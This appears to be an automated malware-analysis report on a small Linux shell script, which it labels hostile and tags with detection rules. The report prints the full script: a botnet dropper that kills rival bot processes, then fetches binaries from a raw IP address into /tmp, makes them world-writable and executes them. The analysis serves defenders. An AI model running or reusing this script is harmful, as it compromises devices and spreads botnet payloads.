Open-source atomic malware analysis

Analyze another

bb58d33eb60e8773345e972c17577a227e54a663ecefdf004d3bdc40e3c26cab

SHELL
Verdict: HOSTILE
AI Malicious script downloads and executes payloads
Mal-ecule
O₂(C₄I)H₃(Cm₂F₅Po₂)
Size 844 B download
First seen 20 days ago
Analyzed 19 days ago
Ecosystem linux
Source abuse.ch
Also detected by 2 sources
Raw-IP wget world-writable fetch execute: lil:0x1a0
Repeated raw-IP payload download chmod execution: lil:0x1a0
Raw IP bulk download chmod execute: lil:0x1a0
lil shell
1 #!/bin/sh
2 for proc_dir in /proc/[0-9]*; do Shell procfs path filter before kill
3 pid=${proc_dir##*/}
4
5 exe_line=$(ls -l "/proc/$pid/exe" 2>/dev/null)
6 [ -z "$exe_line" ] && continue
7
8 exe_target=${exe_line##* -> }
9 [ -z "$exe_target" ] && continue
10
11 case "$exe_target" in
12 *"(deleted)"*|*"/."*|*"telnetdbot"*|*"dvrLocker"*|*"acd"*|*"dvrHelper"*|*".c.pid"*)
13 kill -9 "$pid"
14 ;;
15 esac
16 done
17 cd /tmp; rm -rf P3B; wget http://129.121.114.124/P3B; chmod 777 P3B; ./P3B lilin; Raw-IP wget world-writable fetch execute
18 cd /tmp; rm -rf f2m; wget http://129.121.114.124/f2m; chmod 777 f2m; ./f2m lilin;
19 cd /tmp; rm -rf Sg2s; wget http://129.121.114.124/Sg2s; chmod 777 Sg2s; ./Sg2s lilin;
20 cd /tmp; rm -rf dLN; wget http://129.121.114.124/dLN; chmod 777 dLN; ./dLN lilin;
21 cd /tmp; rm -rf bsLI; wget http://129.121.114.124/bsLI; chmod 777 bsLI; ./bsLI lilin;
22 echo "" > lil; rm -rf lil;

Objectives

Micro-behaviors

Identity

SHA-256 bb58d33eb60e8773345e972c17577a227e54a663ecefdf004d3bdc40e3c26cab
Filename lil
Package bb58d33eb60e8773345e972c17577a227e54a663ecefdf004d3bdc40e3c26cab

Origin

Source harvest
Feed malwarebazaar
Ecosystem linux
Domain abuse.ch

Timeline

First seen 4 Aug 2026 08:30 UTC
First analyzed 5 Aug 2026 12:32 UTC
Last analyzed 5 Aug 2026 12:32 UTC
Last updated 5 Aug 2026 12:32 UTC

Labeling

Label bad
Label source harvest
Traits version b5ca8